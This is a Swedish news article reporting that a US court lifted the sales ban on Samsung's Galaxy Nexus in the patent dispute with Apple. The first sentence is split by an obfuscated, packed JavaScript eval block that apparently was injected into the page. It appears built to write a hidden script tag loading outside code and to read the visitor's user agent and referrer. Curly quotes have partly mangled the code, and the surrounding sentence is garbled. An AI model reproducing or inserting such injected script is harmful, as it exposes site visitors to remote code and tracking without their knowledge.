Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

Seger för Samsung över Apple

Seger för Samsung över Apple
Sebastian Plengier Ehrnfelt

Igår eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tksri|var|u0026u|referrer|trnak||js|php’.split(‘|’),0,{}))
vart en stor dag för företaget Samsung. I USA hävdes det säljstopp som Samsungs Galaxy Nexus utfärdats i slutet av juni. 

Enligt den amerikanska domstolen har Apple misslyckats bevisa att deras företag drabbats negativt med sin försäljning på grund av Galaxy Nexus.

Apple menar att Galaxy Nexus gör intrång på Apples patent och menar att konsumenter väljer den telefonen istället för iPhone.

Detta domstols beslut kommer inte har någon större inverkan på försäljningen då Samsung Galaxy Nexus är en föredetta modell. Dock enligt professor Colleen Chien vid Santa Clara Law School kan detta domstolsbeskydd betyda att det kommer bli svårare för företag att kräva liknande säljstopp av konkurrenters produkter i framtiden.

Ingen av företagen Apple eller Samsung har kommenterat detta domstolsbeslut skriver Reuters.